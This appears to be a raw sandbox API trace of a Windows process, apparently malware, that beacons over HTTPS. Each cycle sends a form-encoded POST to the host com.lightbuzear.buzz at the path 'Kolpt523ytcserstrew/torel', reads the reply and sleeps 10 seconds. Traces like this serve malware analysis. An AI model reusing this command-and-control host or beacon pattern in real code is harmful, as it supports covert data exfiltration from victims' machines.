[0213.306] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4814d20 | out: hHeap=0x4780000) returned 1 [0213.306] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4814d20 [0213.306] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0213.306] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48153b0 [0213.307] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0213.307] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0213.307] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0213.307] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0213.308] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48153b0 | out: hHeap=0x4780000) returned 1 [0213.308] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0213.308] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6e0 [0213.308] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce630 [0213.308] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0213.308] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce570 [0213.308] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0213.308] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5b0 [0213.308] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0213.308] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5c0 [0213.308] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0213.308] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ea60 [0213.308] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0213.308] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482eb98 [0213.308] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ea60 | out: hHeap=0x4780000) returned 1 [0213.308] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0213.308] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eb98 | out: hHeap=0x4780000) returned 1 [0213.309] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48153b0 [0213.309] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0213.309] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbda0 [0213.309] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48153b0 | out: hHeap=0x4780000) returned 1 [0213.309] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48153b0 [0213.309] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0213.309] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48154a0 [0213.309] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0213.309] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbda0 | out: hHeap=0x4780000) returned 1 [0213.310] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0213.310] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0213.310] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48154a0 | out: hHeap=0x4780000) returned 1 [0213.310] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0213.310] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0213.310] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0213.310] FreeLibrary (hLibModule=0x71570000) returned 1 [0213.310] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0213.310] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0213.311] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a3c0 | out: hHeap=0x4780000) returned 1 [0213.311] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a398 | out: hHeap=0x4780000) returned 1 [0213.311] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a280 | out: hHeap=0x4780000) returned 1 [0213.311] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a1e0 | out: hHeap=0x4780000) returned 1 [0213.311] Sleep (dwMilliseconds=0x2710) [0213.471] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce620 [0213.471] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce740 [0213.471] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0213.471] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0213.471] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0213.471] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6a0 [0213.471] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0213.471] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce630 [0213.471] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0213.471] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ebb0 [0213.471] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0213.471] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ea90 [0213.471] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ebb0 | out: hHeap=0x4780000) returned 1 [0213.471] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0213.471] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ea90 | out: hHeap=0x4780000) returned 1 [0213.471] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482ea60 [0213.471] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48154a0 [0213.472] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48154a0 | out: hHeap=0x4780000) returned 1 [0213.472] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0213.472] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48154a0 [0213.472] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0213.472] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6c0 [0213.472] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6a0 [0213.472] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0213.472] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce740 [0213.472] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0213.473] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0213.473] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0213.473] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce640 [0213.473] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0213.473] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ebe0 [0213.473] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0213.473] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ebb0 [0213.473] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ebe0 | out: hHeap=0x4780000) returned 1 [0213.473] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0213.473] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ebb0 | out: hHeap=0x4780000) returned 1 [0213.473] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x482a050 [0213.473] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0213.473] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba20 [0213.473] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a050 | out: hHeap=0x4780000) returned 1 [0213.473] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a050 [0213.473] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb940 [0213.473] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a1e0 [0213.474] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb940 | out: hHeap=0x4780000) returned 1 [0213.474] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0213.474] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0213.474] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0213.474] FreeLibrary (hLibModule=0x71780000) returned 1 [0213.474] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a1e0 | out: hHeap=0x4780000) returned 1 [0213.474] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0213.474] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a1e0 [0213.475] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0213.475] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce710 [0213.475] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce570 [0213.475] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0213.475] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6f0 [0213.475] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0213.475] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce620 [0213.475] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0213.475] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0213.475] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0213.475] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ea90 [0213.475] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0213.475] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ebc8 [0213.476] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ea90 | out: hHeap=0x4780000) returned 1 [0213.476] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0213.476] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ebc8 | out: hHeap=0x4780000) returned 1 [0213.476] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482ed00 [0213.476] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a398 [0213.476] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a398 | out: hHeap=0x4780000) returned 1 [0213.476] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0213.476] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a488 [0213.476] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0213.476] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a2a8 [0213.476] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce630 [0213.476] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5c0 [0213.476] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0213.476] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6a0 [0213.477] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0213.477] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce680 [0213.477] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0213.477] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0213.477] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0213.477] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ea78 [0213.477] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0213.477] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482eca0 [0213.477] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ea78 | out: hHeap=0x4780000) returned 1 [0213.477] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0213.477] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eca0 | out: hHeap=0x4780000) returned 1 [0213.477] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482ec10 [0213.477] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a398 [0213.477] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a398 | out: hHeap=0x4780000) returned 1 [0213.477] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0213.477] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0213.478] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce730 [0213.478] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce570 [0213.478] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0213.478] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6b0 [0213.478] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0213.478] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0213.478] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0213.478] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce600 [0213.478] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0213.478] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ea78 [0213.478] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0213.478] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482eaf0 [0213.478] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ea78 | out: hHeap=0x4780000) returned 1 [0213.478] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0213.478] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eaf0 | out: hHeap=0x4780000) returned 1 [0213.478] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x482a280 [0213.478] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0213.478] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb898 [0213.478] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a280 | out: hHeap=0x4780000) returned 1 [0213.478] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a280 [0213.478] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe48 [0213.478] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a398 [0213.479] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe48 | out: hHeap=0x4780000) returned 1 [0213.479] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb898 | out: hHeap=0x4780000) returned 1 [0213.498] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0213.498] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0213.499] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a398 | out: hHeap=0x4780000) returned 1 [0213.499] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0213.499] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce750 [0213.499] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0213.499] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0213.499] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0213.499] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce640 [0213.499] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0213.499] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce570 [0213.499] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0213.499] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482eb38 [0213.499] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0213.499] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482eca0 [0213.499] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eb38 | out: hHeap=0x4780000) returned 1 [0213.499] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0213.499] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eca0 | out: hHeap=0x4780000) returned 1 [0213.499] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x482a3c0 [0213.499] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0213.499] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba58 [0213.499] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a3c0 | out: hHeap=0x4780000) returned 1 [0213.499] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a398 [0213.499] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbf28 [0213.499] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a3c0 [0213.500] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0213.500] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba58 | out: hHeap=0x4780000) returned 1 [0213.500] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0213.501] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0215.846] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a3c0 | out: hHeap=0x4780000) returned 1 [0215.847] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce610 [0215.847] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6a0 [0215.847] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0215.847] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0215.847] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5e0 [0215.847] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0215.847] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6e0 [0215.848] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0215.848] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce570 [0215.848] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0215.848] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0215.848] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0215.848] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ead8 [0215.848] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0215.848] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482eb98 [0215.848] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ead8 | out: hHeap=0x4780000) returned 1 [0215.848] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0215.848] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eb98 | out: hHeap=0x4780000) returned 1 [0215.848] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x481f560 [0215.848] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0215.848] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb898 [0215.848] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f560 | out: hHeap=0x4780000) returned 1 [0215.848] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f560 [0215.848] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb908 [0215.848] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a3c0 [0215.849] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb908 | out: hHeap=0x4780000) returned 1 [0215.849] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb898 | out: hHeap=0x4780000) returned 1 [0215.849] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0215.849] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0215.849] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a3c0 | out: hHeap=0x4780000) returned 1 [0215.850] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0215.850] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6e0 [0215.850] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6b0 [0215.850] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0215.850] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5c0 [0215.850] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0215.850] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0215.850] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0215.850] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce600 [0215.850] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0215.850] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ecd0 [0215.850] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0215.850] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ece8 [0215.850] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ecd0 | out: hHeap=0x4780000) returned 1 [0215.850] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0215.850] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ece8 | out: hHeap=0x4780000) returned 1 